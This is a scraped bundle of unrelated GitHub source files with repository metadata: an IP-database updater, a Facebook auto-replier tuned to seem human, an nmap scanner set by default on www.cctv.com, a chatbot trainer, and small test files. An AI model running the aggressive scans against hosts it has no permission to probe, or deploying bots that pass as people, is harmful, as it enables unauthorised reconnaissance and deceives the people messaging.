filename = os.path.abspath(data_dir+os.path.sep+"czipdata.dat")
file_set(filename)
version_file = os.path.abspath(data_dir+os.path.sep+"czipdata_version.bin")
file_set(version_file)
ret = ipUpdate.datdown(filename,version_file)
if ret > 0:
print('成功写入到%s, %s字节' %
(filename, format(ret, ','))
)
print( "------------------------------------------- \n " )
elif ret == 0:
print( "------------------------------------------- \n " )
else:
print('写入失败, 错误代码: %d' % ret)
print( "------------------------------------------- \n " )
def dat2Txt(dat_filename= None, txt_filename= None, startIndex= None, endIndex= None):
"""
@description :将纯真IP数据库的dat文件转换为txt文本文件
---------
@params :dat_filename : 纯真IP数据库的dat文件名或路径,默认为"../data/czipdata.dat"
txt_filename : 输出文本文件的文件名或路径,默认为"../data/czipdata.txt"
startIndex : 起始索引, 默认为0
endIndex : 结束索引, 默认为IP数据库总记录数
-------
@Returns :None
-------
"""
if dat_filename == None:
dat_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.dat")
if not file_set(dat_filename) or default_dat_update:
down(dat_filename)
q = dat2txt.IPLoader(dat_filename)
if txt_filename == None:
txt_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.txt")
file_set(txt_filename)
if startIndex == None:
startIndex = 0
if endIndex == None:
endIndex = q.idx_count
ip_info = q.get_ip_info(txt_filename,startIndex,endIndex)
def dat2Mysql(mysql_object,ip_tablename= None, txt_filename= None):
"""
@description :将纯真IP数据库的txt文件转换至mysql数据库指定表中
---------
@params :ip_tablename : mySQL中IP数据库的表名,默认为"iprange_info"
txt_filename : 输入文本文件的文件名或路径,默认为"../data/czipdata.txt"
-------
@Returns :None
-------
"""
if txt_filename == None:
txt_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.txt")
if not file_set(txt_filename):
dat2Txt(txt_filename= txt_filename)
if ip_tablename == None:
ip_tablename = 'iprange_info'
mysql = mysql_object
dat2mysql(mysql,ip_tablename,txt_filename)
def collegeupdate(collegeJson= None, college_tablename= None):
"""
@description :从'https://github.com/pg7go/The-Location-Data-of-Schools-in-China'导入'大学-8084.json'至指定json格式文件名.
---------
@param :collegeJson : 输出大学数据的json文件名或路径,默认为"./tmp/college.json".
college_tablename : mySQL中IP数据库的大学信息表的表名,默认为"college_info"
-------
@Returns :None
-------
"""
if collegeJson == None:
collegeJson = os.path.abspath(tmp_dir+os.path.sep+"college.json")
if college_tablename == None:
college_tablename = 'college_info'
collegeUpdate(filename, college_tablename)
def convertipv4(mysql_object,college_tablename= None,num_config= None,start_id= None,college_filename= None,correct_filename= None):
"""
@description :将纯真IP数据库内的地址细分为省市区
---------
@params :num_config : 每次处理ip信息的记录数, 默认为20000.
start_id : 处理ip信息的起始记录索引值, 默认为1.
college_tablename : mySQL中IP数据库的大学信息表的表名,默认为"college_info".
college_filename : 输出大学数据的json文件名或路径,默认为"./tmp/college.json".
correct_filename : 自定义纠错文件的json文件名或路径,默认为"../data/correct.json".
-------
@Returns :None
-------
"""
if num_config == None:
num_config = 20000
if start_id == None:
start_id = 1
if college_tablename == None:
college_tablename = 'college_info'
if college_filename == None:
college_filename = os.path.abspath(tmp_dir+os.path.sep+"college.json")
if correct_filename == None:
correct_filename = os.path.abspath(data_dir+os.path.sep+"correct.json")
file_set(correct_filename)
convert(mysql_object,college_tablename,num_config,start_id,college_filename,correct_filename)
def sqldump(mysql_object):
print( "连接IP数据库, 并导出为sql文件: \n---------------处理中, 请稍候---------------")
sql_file = os.path.abspath(data_dir+os.path.sep+"ipdatabase.sql")
os.system('mysqldump -h %s -P %s -u %s -p%s %s > %s' % (config['mysql'].host, config['mysql'].port, config['mysql'].user, config['mysql'].password, config['mysql'].ip_database, sql_file))
print( "IP数据库导出成功! ")
table_college_info_sql_file = os.path.abspath(data_dir+os.path.sep+"college_info.sql")
table_iprange_info_sql_file = os.path.abspath(data_dir+os.path.sep+"iprange_info.sql")
os.system('mysqldump -h %s -P %s -u %s -p%s %s college_info > %s' % (config['mysql'].host, config['mysql'].port, config['mysql'].user, config['mysql'].password, config['mysql'].ip_database, table_college_info_sql_file))
print( "高校信息表导出成功! ")
os.system('mysqldump -h %s -P %s -u %s -p%s %s iprange_info > %s' % (config['mysql'].host, config['mysql'].port, config['mysql'].user, config['mysql'].password, config['mysql'].ip_database, table_iprange_info_sql_file))
print( "IP数据表导出成功! ")
if __name__ == '__main__':
"""
@description :实现纯真IP数据库的下载和更新.
---------
@params :None
-------
@Returns :None
-------
"""
filename = os.path.abspath(data_dir+os.path.sep+"czipdata.dat")
if os.path.exists(filename):
txt_filename = os.path.abspath(data_dir+os.path.sep+"czipdata.txt")
if os.path.exists(txt_filename):
dat2Txt(txt_filename= txt_filename)
#pass
mysql = mysql_Database(config['mysql'].ip_database)
dat2Mysql(mysql)
convertipv4(mysql)
sqldump(mysql) | [
"56478790+a76yyyy@users.noreply.github.com"
] | 56478790+a76yyyy@users.noreply.github.com |
36ab76b0fa7fe370c21c2b648632c72e9f5e83b4 | 137c12d79502122cb3206571bcf92e9754fd3cc9 | /responder.py | b3ca16897f31ea3b5ff04a57419fde83e1ccf5e1 | [] | no_license | BartusZdebski/fb-autoresponder | 4f43656427c9b6641e4d7321bb711a960980f664 | e1829b05beb3551e82b75ccbfa38a6e8994a93fc | refs/heads/master | 2020-07-18T11:59:29.953217 | 2019-09-04T06:28:52 | 2019-09-04T06:28:52 | 206,241,796 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,890 | py | import secrets
import threading
import time
import re
import random
import json
from fbchat import log, Client, Message
with open('contacts.json', 'r', encoding='utf-8') as file:
contacts = json.load(file)
log.info("Loaded contacts:")
for contact in contacts["contacts"]:
log.info("* " + contact)
log.info("")
with open('replies.json', 'r', encoding='utf-8') as file:
replies = json.load(file)
log.info("Loaded replies:")
for reply in replies["replies"]:
log.info("* " + reply)
log.info("")
log.info("")
log.info("")
class Bot(Client):
#Listen for the event
def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):
#Mark the newest received messagfe as delivered and as read
self.markAsDelivered(thread_id, message_object.uid)
#Fetch sender name to check for whitelist
sender_name = client.fetchUserInfo(author_id)[author_id].name
log.info("Received message from" + sender_name + ", text: " + message_object.text)
def sendReply():
#Handle replying
log.info("Sending message to " + sender_name + ", text:" + reply)
#Send the message
self.send(Message(text=reply), thread_id=thread_id, thread_type=thread_type)
#Check whether the sender is on whitelist
for contact in contacts["contacts"]:
if contact in sender_name:
#Select random reply...
reply = secrets.choice(replies['replies'])
#Handle interactive replies
if "{}" in reply:
reply = reply.format(sender_name.split()[0])
#Generate a random delay to make it more humanlike?
delayTime = float(random.randrange(5,25,1))
#Mark it as read...
self.markAsRead(thread_id)
#Make a thread so it doesn't clog up the main thread
threading.Timer(delayTime, sendReply).start()
#Log in and listen
client = Bot("login@mail.com", "password")
client.listen() | [
"noreply@github.com"
] | BartusZdebski.noreply@github.com |
a23776a69c1c30f0a065d46cab1f8ca2e0904e26 | 741191d21d1248b0501ca4fcba7c548998e82b3c | /spidermanage/spidertool/sniffertool.py | 3267591c39100a33d9c29eef25f06e2c5b462eba | [] | no_license | CryptoConsultants/toolforspider | 27fd2df948846c2a40908f3f3deea1422bea4410 | eb1c3a362c360852be734d8f296512e02bf3b045 | refs/heads/master | 2021-01-17T07:28:11.671526 | 2016-02-19T09:06:15 | 2016-02-19T09:06:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,427 | py | #!/usr/bin/python
#coding:utf-8
'''
Created on 2015年10月29日
@author: sherwel
'''
import sys
import nmap
import os
import time
import SQLTool
import Sqldatatask
import config
import Sqldata
from numpy.numarray.numerictypes import IsType
import connectpool
import portscantask
import getLocationTool
reload(sys) # Python2.5 初始化后会删除 sys.setdefaultencoding 这个方法,我们需要重新载入
class SniffrtTool(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
try:
self.nma = nmap.PortScanner() # instantiate nmap.PortScanner object
self.params='-A -Pn -sC -R -v -O '
# self.params='-sV -T4 -O ' #快捷扫描加强版
# self.params='-sS -sU -T4 -A -v' #深入扫描
except nmap.PortScannerError:
print('Nmap not found', sys.exc_info()[0])
except:
print('Unexpected error:', sys.exc_info()[0])
self.config=config.Config
self.sqlTool=Sqldatatask.getObject()
# self.sqlTool=SQLTool.getObject()
self.portscan=portscantask.getObject()
self.getlocationtool=getLocationTool.getObject()
def scaninfo(self,hosts='localhost', port='', arguments='',hignpersmission='0',callback=''):
if callback=='':
callback=self.callback_result
orders=''
if port!='':
orders+=port
else :
orders=None
try:
if hignpersmission=='0':
print '我在这里49'
print hosts,orders,self.params+arguments
acsn_result=self.nma.scan(hosts=hosts,ports= orders,arguments=self.params+arguments)
#acsn_result=self.nma.scan(hosts=hosts,ports= orders,arguments=arguments)
print acsn_result
print '我在这里51'
return callback(acsn_result)
else:
print '我在这里52'
return callback(self.nma.scan(hosts=hosts,ports= orders,arguments=arguments,callback=callback) )
except nmap.PortScannerError,e:
print e
print '我在这里57'
return ''
except:
print('Unexpected error:', sys.exc_info()[0])
print '我在这里62'
return ''
def callback_result(self,scan_result):
print '——————'
tmp=scan_result
for i in tmp['scan'].keys():
host=i
result=''
try:
# result = u"ip地址:%s 主机名:%s ...... %s\n" %(host,tmp['scan'][host].get('hostnames','null'),tmp['scan'][host]['status'].get('state','null'))
# self.sqlTool.connectdb()
# print tmp['scan'][host].get('hostname','null')
# if 'osclass' in tmp['scan'][host].keys():
# result +=u"系统信息 : %s %s %s 准确度:%s \n" % (str(tmp['scan'][host]['osclass'].get('vendor','null')),str(tmp['scan'][host]['osclass'].get('osfamily','null')),str(tmp['scan'][host]['osclass'].get('osgen','null')),str(tmp['scan'][host]['osclass'].get('accuracy','null')))
# print result
temphosts=str(host)
localtime=str(time.strftime("%Y-%m-%d %X", time.localtime()))
self.getlocationtool.add_work([temphosts])
try :
tempvendor=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('vendor','null'))
temposfamily=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('osfamily','null'))
temposgen=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('osgen','null'))
tempaccuracy=str(tmp['scan'][host]['osmatch'][0]['osclass'][0].get('accuracy','null'))
temphostname=''
for i in tmp['scan'][host]['hostnames']:
temphostname+=str(i.get('name','null'))+' '
tempstate=str(tmp['scan'][host]['status'].get('state','null'))
# print temphosts,tempvendor,temposfamily,temposgen,tempaccuracy,localtime
# self.sqlTool.replaceinserttableinfo_byparams(table=self.config.iptable,select_params= ['ip','vendor','osfamily','osgen','accurate','updatetime','hostname','state'],insert_values= [(temphosts,tempvendor,temposfamily,temposgen,tempaccuracy,localtime,temphostname,tempstate)])
sqldatawprk=[]
dic={"table":self.config.iptable,"select_params": ['ip','vendor','osfamily','osgen','accurate','updatetime','hostname','state'],"insert_values": [(temphosts,tempvendor,temposfamily,temposgen,tempaccuracy,localtime,temphostname,tempstate)]}
tempwprk=Sqldata.SqlData('replaceinserttableinfo_byparams',dic)
sqldatawprk.append(tempwprk)
self.sqlTool.add_work(sqldatawprk)
except Exception,e:
print 'nmap system error'+str(e)
if 'tcp' in tmp['scan'][host].keys():
ports = tmp['scan'][host]['tcp'].keys()
for port in ports:
# portinfo = " port : %s name:%s state : %s product : %s version :%s script:%s \n" %(port,tmp['scan'][host]['tcp'][port].get('name',''),tmp['scan'][host]['tcp'][port].get('state',''), tmp['scan'][host]['tcp'][port].get('product',''),tmp['scan'][host]['tcp'][port].get('version',''),tmp['scan'][host]['tcp'][port].get('script',''))
tempport=str(port)
tempportname=str(tmp['scan'][host]['tcp'][port].get('name',''))
tempportstate=str(tmp['scan'][host]['tcp'][port].get('state',''))
tempproduct=str(tmp['scan'][host]['tcp'][port].get('product',''))
tempportversion=str(tmp['scan'][host]['tcp'][port].get('version',''))
tempscript=str(tmp['scan'][host]['tcp'][port].get('script',''))
# self.sqlTool.replaceinserttableinfo_byparams(table=self.config.porttable,select_params= ['ip','port','timesearch','state','name','product','version','script'],insert_values= [(temphosts,tempport,localtime,tempportstate,tempportname,tempproduct,tempportversion,tempscript)])
sqldatawprk=[]
dic={"table":self.config.porttable,"select_params": ['ip','port','timesearch','state','name','product','version','script'],"insert_values": [(temphosts,tempport,localtime,tempportstate,tempportname,tempproduct,tempportversion,tempscript)]}
tempwprk=Sqldata.SqlData('replaceinserttableinfo_byparams',dic)
sqldatawprk.append(tempwprk)
self.sqlTool.add_work(sqldatawprk)
self.portscan.add_work([(tempportname,temphosts,tempport,tempportstate)])
elif 'udp' in tmp['scan'][host].keys():
ports = tmp['scan'][host]['udp'].keys()
for port in ports:
# portinfo = " port : %s name:%s state : %s product : %s version :%s script:%s \n" %(port,tmp['scan'][host]['udp'][port].get('name',''),tmp['scan'][host]['udp'][port].get('state',''), tmp['scan'][host]['udp'][port].get('product',''),tmp['scan'][host]['udp'][port].get('version',''),tmp['scan'][host]['udp'][port].get('script',''))
# result = result + portinfo
tempport=str(port)
tempportname=str(tmp['scan'][host]['udp'][port].get('name',''))
tempportstate=str(tmp['scan'][host]['udp'][port].get('state',''))
tempproduct=str(tmp['scan'][host]['udp'][port].get('product',''))
tempportversion=str(tmp['scan'][host]['udp'][port].get('version',''))
tempscript=str(tmp['scan'][host]['udp'][port].get('script',''))
# self.sqlTool.replaceinserttableinfo_byparams(table=self.config.porttable,select_params= ['ip','port','timesearch','state','name','product','version','script'],insert_values= [(temphosts,tempport,localtime,tempportstate,tempportname,tempproduct,tempportversion,tempscript)])
sqldatawprk=[]
dic={"table":self.config.porttable,"select_params": ['ip','port','timesearch','state','name','product','version','script'],"insert_values": [(temphosts,tempport,localtime,tempportstate,tempportname,tempproduct,tempportversion,tempscript)]}
tempwprk=Sqldata.SqlData('replaceinserttableinfo_byparams',dic)
sqldatawprk.append(tempwprk)
self.sqlTool.add_work(sqldatawprk)
except Exception,e:
print 'nmap error'+str(e)
except IOError,e:
print '错误IOError'+str(e)
except KeyError,e:
print '不存在该信息'+str(e)
finally:
# print result
return str(scan_result)
def scanaddress(self,hosts=[], ports=[],arguments=''):
temp=''
for i in range(len(hosts)):
if len(ports)<=i:
result=self.scaninfo(hosts=hosts[i],arguments=arguments)
if result is None:
pass
else:
temp+=result
else:
result=self.scaninfo(hosts=hosts[i], port=ports[i],arguments=arguments)
if result is None:
pass
else:
temp+=result
return temp
def isrunning(self):
return self.nma.has_host(self.host)
def callback_resultl(host, scan_result):
print '———不触发这个函数———'
tmp=scan_result
result=''
try:
result = u"ip地址:%s 主机名:%s ...... %s\n" %(host,tmp['scan'][host]['hostname'],tmp['scan'][host]['status']['state'])
if 'osclass' in tmp['scan'][host].keys():
result +=u"系统信息 : %s %s %s 准确度:%s \n" % (str(tmp['scan'][host]['osclass']['vendor']),str(tmp['scan'][host]['osclass']['osfamily']),str(tmp['scan'][host]['osclass']['osgen']),str(tmp['scan'][host]['osclass']['accuracy']))
if 'tcp' in tmp['scan'][host].keys():
ports = tmp['scan'][host]['tcp'].keys()
for port in ports:
portinfo = " port : %s name:%s state : %s product : %s version :%s script:%s \n" %(port,tmp['scan'][host]['tcp'][port]['name'],tmp['scan'][host]['tcp'][port]['state'], tmp['scan'][host]['tcp'][port]['product'],tmp['scan'][host]['tcp'][port]['version'],tmp['scan'][host]['tcp'][port]['script'])
print portinfo
result+= portinfo
elif 'udp' in tmp['scan'][host].keys():
ports = tmp['scan'][host]['udp'].keys()
for port in ports:
portinfo = " port : %s name:%s state : %s product : %s version :%s script:%s \n" %(port,tmp['scan'][host]['udp'][port]['name'],tmp['scan'][host]['udp'][port]['state'], tmp['scan'][host]['udp'][port]['product'],tmp['scan'][host]['udp'][port]['version'],tmp['scan'][host]['udp'][port]['script'])
result += portinfo
except Exception,e:
print e
except IOError,e:
print '错误IOError'+str(e)
except KeyError,e:
print '不存在该信息'+str(e)
finally:
return result
"""
def callback_resultl(host, scan_result):
print scan_result
print scan_result['scan']
f = open('abc.xml','w+')
f.write(str(scan_result))
f.close()
"""
order=' -P0 -sV -sC -sU -O -v -R -sT '
orderq='-A -P0 -Pn -sC -p '
if __name__ == "__main__":
temp=SniffrtTool()
# hosts=['www.cctv.com','localhost','www.baidu.com']'www.cctv.com' www.vip.com
hosts=['www.cctv.com']
temp.scanaddress(hosts,ports=['80'],arguments='')
# print time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
| [
"nanshihui@qq.com"
] | nanshihui@qq.com |
a1e6b00361eac98b2587ff68b2e064c6d9e759ef | 0fb2101a65af3984f449e754957a7af54a4d0e14 | /src/constants/__init__.py | ff752e818051e514be55f79707d409038d803edc | [] | no_license | lequang-hp/movie_suggest | 7c3145763a86c47ca1417adc6093ef27176b3839 | 02de6543d6aef3d46e80152ad5d382f29c7cc99d | refs/heads/master | 2023-03-20T07:33:54.961771 | 2021-02-22T03:53:14 | 2021-02-22T03:53:14 | 340,307,447 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | from .common import Common
from .task_status import TaskStatus | [
"lequang0810@gmail.com"
] | lequang0810@gmail.com |
d1fb8c206ccf7bfad15ca6ea7a274a3c1351c83b | 3bc9ef617571cd95d76a745020bbfe29fe16e5b8 | /seq2seq-chatbot/run.py | f1cf79ada98c1391812c74a44ed51018a26508ca | [] | no_license | Tianyijian/pytorch-tutorial | 8af1696b84042c590c467821192ed45242d3ccdc | 4945f657ea7043e3e8475d484c62b40999e99eff | refs/heads/master | 2022-11-23T00:34:52.123273 | 2022-11-07T14:25:31 | 2022-11-07T14:25:31 | 228,196,035 | 1 | 0 | null | 2022-11-07T14:25:32 | 2019-12-15T14:18:11 | Python | UTF-8 | Python | false | false | 12,315 | py | import torch.optim as optim
from torch.utils.tensorboard import SummaryWriter
from data import *
from model import *
import argparse
device = torch.device("cuda:8" if torch.cuda.is_available() else "cpu")
writer = SummaryWriter("logs")
# 配置模型
model_name = 'cb_model'
attn_model = 'dot'
# attn_model = 'general'
# attn_model = 'concat'
hidden_size = 500
encoder_n_layers = 2
decoder_n_layers = 2
dropout = 0.1
batch_size = 256
# 配置训练/优化
clip = 50.0
teacher_forcing_ratio = 1.0
learning_rate = 0.0001
decoder_learning_ratio = 5.0
n_iteration = 4000
print_every = 1
save_every = 1000
def maskNLLLoss(inp, target, mask):
nTotal = mask.sum()
crossEntropy = -torch.log(torch.gather(inp, 1, target.view(-1, 1)).squeeze(1))
loss = crossEntropy.masked_select(mask).mean()
loss = loss.to(device)
return loss, nTotal.item()
def train(input_variable, lengths, target_variable, mask, max_target_len, encoder, decoder, embedding,
encoder_optimizer, decoder_optimizer, batch_size, clip, teacher_forcing_ratio, max_length=MAX_LENGTH):
# 零化梯度
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
# 设置设备选项
input_variable = input_variable.to(device)
lengths = lengths.to(device)
target_variable = target_variable.to(device)
mask = mask.to(device)
# 初始化变量
loss = 0
print_losses = []
n_totals = 0
# 正向传递编码器
encoder_outputs, encoder_hidden = encoder(input_variable, lengths)
# 创建初始解码器输入(从每个句子的SOS令牌开始)
decoder_input = torch.LongTensor([[SOS_token for _ in range(batch_size)]])
decoder_input = decoder_input.to(device)
# 将初始解码器隐藏状态设置为编码器的最终隐藏状态
decoder_hidden = encoder_hidden[:decoder.n_layers]
# 确定我们是否此次迭代使用`teacher forcing`
use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False
# 通过解码器一次一步地转发一批序列
if use_teacher_forcing:
for t in range(max_target_len):
decoder_output, decoder_hidden = decoder(
decoder_input, decoder_hidden, encoder_outputs
)
# Teacher forcing: 下一个输入是当前的目标
decoder_input = target_variable[t].view(1, -1)
# 计算并累计损失
mask_loss, nTotal = maskNLLLoss(decoder_output, target_variable[t], mask[t])
loss += mask_loss
print_losses.append(mask_loss.item() * nTotal)
n_totals += nTotal
else:
for t in range(max_target_len):
decoder_output, decoder_hidden = decoder(
decoder_input, decoder_hidden, encoder_outputs
)
# No teacher forcing: 下一个输入是解码器自己的当前输出
_, topi = decoder_output.topk(1)
decoder_input = torch.LongTensor([[topi[i][0] for i in range(batch_size)]])
decoder_input = decoder_input.to(device)
# 计算并累计损失
mask_loss, nTotal = maskNLLLoss(decoder_output, target_variable[t], mask[t])
loss += mask_loss
print_losses.append(mask_loss.item() * nTotal)
n_totals += nTotal
# 执行反向传播
loss.backward()
# 剪辑梯度:梯度被修改到位
_ = torch.nn.utils.clip_grad_norm_(encoder.parameters(), clip)
_ = torch.nn.utils.clip_grad_norm_(decoder.parameters(), clip)
# 调整模型权重
encoder_optimizer.step()
decoder_optimizer.step()
return sum(print_losses) / n_totals
def trainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer, embedding,
encoder_n_layers, decoder_n_layers, save_dir, n_iteration, batch_size, print_every, save_every, clip,
corpus_name, loadFilename, teacher_forcing_ratio, hidden_size):
# 为每次迭代加载batches
training_batches = [batch2TrainData(voc, [random.choice(pairs) for _ in range(batch_size)])
for _ in range(n_iteration)]
# 初始化
print('Initializing ...')
start_iteration = 1
print_loss = 0
# if loadFilename:
# start_iteration = checkpoint['iteration'] + 1
# 训练循环
print("Training...")
for iteration in range(start_iteration, n_iteration + 1):
training_batch = training_batches[iteration - 1]
# 从batch中提取字段
input_variable, lengths, target_variable, mask, max_target_len = training_batch
# 使用batch运行训练迭代
loss = train(input_variable, lengths, target_variable, mask, max_target_len, encoder,
decoder, embedding, encoder_optimizer, decoder_optimizer, batch_size, clip, teacher_forcing_ratio)
print_loss += loss
# 打印进度
if iteration % print_every == 0:
print_loss_avg = print_loss / print_every
print("Iteration: {}; Percent complete: {:.1f}%; Average loss: {:.4f}".format(iteration,
iteration / n_iteration * 100,
print_loss_avg))
writer.add_scalar("loss", print_loss_avg, iteration)
print_loss = 0
# 保存checkpoint
if (iteration % save_every == 0):
directory = os.path.join(save_dir,
'{}-{}_{}'.format(encoder_n_layers, decoder_n_layers, hidden_size))
if not os.path.exists(directory):
os.makedirs(directory)
torch.save({
'iteration': iteration,
'en': encoder.state_dict(),
'de': decoder.state_dict(),
'en_opt': encoder_optimizer.state_dict(),
'de_opt': decoder_optimizer.state_dict(),
'loss': loss,
'voc_dict': voc.__dict__,
'embedding': embedding.state_dict()
}, os.path.join(directory, '{}_{}.tar'.format(iteration, 'checkpoint')))
writer.close()
def evaluate(searcher, voc, sentence, max_length=MAX_LENGTH):
### 格式化输入句子作为batch
# words -> indexes
indexes_batch = [indexesFromSentence(voc, sentence)]
# 创建lengths张量
lengths = torch.tensor([len(indexes) for indexes in indexes_batch])
# 转置batch的维度以匹配模型的期望
input_batch = torch.LongTensor(indexes_batch).transpose(0, 1)
# 使用合适的设备
input_batch = input_batch.to(device)
lengths = lengths.to(device)
# 用searcher解码句子
tokens, scores = searcher(input_batch, lengths, max_length)
# indexes -> words
decoded_words = [voc.index2word[token.item()] for token in tokens]
return decoded_words
def evaluateInput(searcher, voc):
input_sentence = ''
while (1):
try:
# 获取输入句子
input_sentence = input('> ')
# 检查是否退出
if input_sentence == 'q' or input_sentence == 'quit': break
# 规范化句子
input_sentence = normalizeString(input_sentence)
# 评估句子
output_words = evaluate(searcher, voc, input_sentence)
# 格式化和打印回复句
output = []
for x in output_words:
if not (x == 'EOS' or x == 'PAD'):
output.append(x)
else:
break
print('Bot:', ' '.join(output))
except KeyError:
print("Error: Encountered unknown word.")
def run():
"""训练模型"""
voc, pairs = loadPrepareData(corpus, corpus_name, datafile, save_dir)
pairs = trimRareWords(voc, pairs, MIN_COUNT)
# 设置检查点以加载; 如果从头开始,则设置为None
loadFilename = None
checkpoint_iter = 4000
# loadFilename = os.path.join(save_dir, model_name, corpus_name,
# '{}-{}_{}'.format(encoder_n_layers, decoder_n_layers, hidden_size),
# '{}_checkpoint.tar'.format(checkpoint_iter))
# 如果提供了loadFilename,则加载模型
if loadFilename:
# 如果在同一台机器上加载,则对模型进行训练
checkpoint = torch.load(loadFilename)
# If loading a model trained on GPU to CPU
# checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
encoder_sd = checkpoint['en']
decoder_sd = checkpoint['de']
encoder_optimizer_sd = checkpoint['en_opt']
decoder_optimizer_sd = checkpoint['de_opt']
embedding_sd = checkpoint['embedding']
voc.__dict__ = checkpoint['voc_dict']
print('Building encoder and decoder ...')
# 初始化词向量
embedding = nn.Embedding(voc.num_words, hidden_size)
if loadFilename:
embedding.load_state_dict(embedding_sd)
# 初始化编码器 & 解码器模型
encoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)
decoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, decoder_n_layers, dropout)
if loadFilename:
encoder.load_state_dict(encoder_sd)
decoder.load_state_dict(decoder_sd)
# 使用合适的设备
encoder = encoder.to(device)
decoder = decoder.to(device)
print('Models built and ready to go!')
# 确保dropout layers在训练模型中
encoder.train()
decoder.train()
# 初始化优化器
print('Building optimizers ...')
encoder_optimizer = optim.Adam(encoder.parameters(), lr=learning_rate)
decoder_optimizer = optim.Adam(decoder.parameters(), lr=learning_rate * decoder_learning_ratio)
if loadFilename:
encoder_optimizer.load_state_dict(encoder_optimizer_sd)
decoder_optimizer.load_state_dict(decoder_optimizer_sd)
# 运行训练迭代
print("Starting Training!")
trainIters(model_name, voc, pairs, encoder, decoder, encoder_optimizer, decoder_optimizer,
embedding, encoder_n_layers, decoder_n_layers, save_dir, n_iteration, batch_size,
print_every, save_every, clip, corpus_name, loadFilename, teacher_forcing_ratio, hidden_size)
def test(loadFilename):
"""测试模型"""
voc = Voc(corpus_name)
# 加载保存的模型
# print("Load model: " + loadFilename)
checkpoint = torch.load(loadFilename)
# If loading a model trained on GPU to CPU
# checkpoint = torch.load(loadFilename, map_location=torch.device('cpu'))
encoder_sd = checkpoint['en']
decoder_sd = checkpoint['de']
# encoder_optimizer_sd = checkpoint['en_opt']
# decoder_optimizer_sd = checkpoint['de_opt']
embedding_sd = checkpoint['embedding']
voc.__dict__ = checkpoint['voc_dict']
# 初始化词向量
embedding = nn.Embedding(voc.num_words, hidden_size)
embedding.load_state_dict(embedding_sd)
# 初始化编码器 & 解码器模型
encoder = EncoderRNN(hidden_size, embedding, encoder_n_layers, dropout)
decoder = LuongAttnDecoderRNN(attn_model, embedding, hidden_size, voc.num_words, decoder_n_layers, dropout)
encoder.load_state_dict(encoder_sd)
decoder.load_state_dict(decoder_sd)
# 使用合适的设备
encoder = encoder.to(device)
decoder = decoder.to(device)
print('Ready! Start Chatting!')
# 将dropout layers设置为eval模式
encoder.eval()
decoder.eval()
# 初始化探索模块
searcher = GreedySearchDecoder(encoder, decoder, device, SOS_token)
# 开始聊天(取消注释并运行以下行开始)
evaluateInput(searcher, voc)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="-----ChatBot-----")
parser.add_argument("--mode", default="train", help="train: train the model / test: test saved models")
parser.add_argument("--model_dir",
default="data/save/2-2_500/4000_checkpoint.tar",
help="saved model path")
args = parser.parse_args()
if args.mode == "train":
run()
elif args.mode == "test":
test(args.model_dir)
| [
"2624132357@qq.com"
] | 2624132357@qq.com |
a161ce85ba6b60459f2657b8565d810f08bf63e7 | 8aee98818508a205bf34263e8673289718518670 | /test_server/pixnetproject/tripapp/models.py | fb2cc16bfd1827faecf7d7731f6fc64f2f4f046d | [] | no_license | dovanduy/pixnet_hackathon_2019 | 47fed1afa82326f09cffe8358d2d0bb5f6a8d721 | a9243223ca8a3f9464c2b37bb1732686b683f997 | refs/heads/master | 2023-02-23T09:43:05.692364 | 2020-04-07T10:42:54 | 2020-04-07T10:42:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | from django.db import models
# Create your models here.
class Result(models.Model):
Search = models.CharField(max_length=15)
def __str__(self):
return self.Search | [
"wilbert.phen@gmail.com"
] | wilbert.phen@gmail.com |
d518f64f0bbd5273253b9da996adb85350151238 | 730a0291d90bf220d162791287e422bc4225d164 | /samples/StackResult/fsmpy/StackSynchronized.py | ce716b3963340b6d02b4f30ab46f82112d7579f6 | [
"BSD-3-Clause"
] | permissive | jon-jacky/PyModel | 27442d062e615bd0bf1bd16d86ae56cc4d3dc443 | 457ea284ea20703885f8e57fa5c1891051be9b03 | refs/heads/master | 2022-11-02T14:08:47.012661 | 2022-10-16T09:47:53 | 2022-10-16T09:47:53 | 2,034,133 | 75 | 36 | NOASSERTION | 2021-07-11T21:15:08 | 2011-07-12T04:23:02 | Python | UTF-8 | Python | false | false | 1,026 | py |
# pma.py Stack StackOneScenario -m 6 -o StackSynchronized
# 4 states, 6 transitions, 4 accepting states, 0 unsafe states, 0 finished and 0 deadend states
# actions here are just labels, but must be symbols with __name__ attribute
def Push(): pass
def Pop(): pass
# states, key of each state here is its number in graph etc. below
states = {
0 : {'StackOneScenario': 0, 'Stack': {'stack': []}},
1 : {'StackOneScenario': 0, 'Stack': {'stack': [1]}},
2 : {'StackOneScenario': 0, 'Stack': {'stack': [1, 1]}},
3 : {'StackOneScenario': 0, 'Stack': {'stack': [1, 1, 1]}},
}
# initial state, accepting states, unsafe states, frontier states, deadend states
initial = 0
accepting = [0, 1, 2, 3]
unsafe = []
frontier = []
finished = []
deadend = []
runstarts = [0]
# finite state machine, list of tuples: (current, (action, args, result), next)
graph = (
(0, (Push, (1,), None), 1),
(1, (Pop, (), 1), 0),
(1, (Push, (1,), None), 2),
(2, (Pop, (), 1), 1),
(2, (Push, (1,), None), 3),
(3, (Pop, (), 1), 2),
)
| [
"jon@u.washington.edu"
] | jon@u.washington.edu |
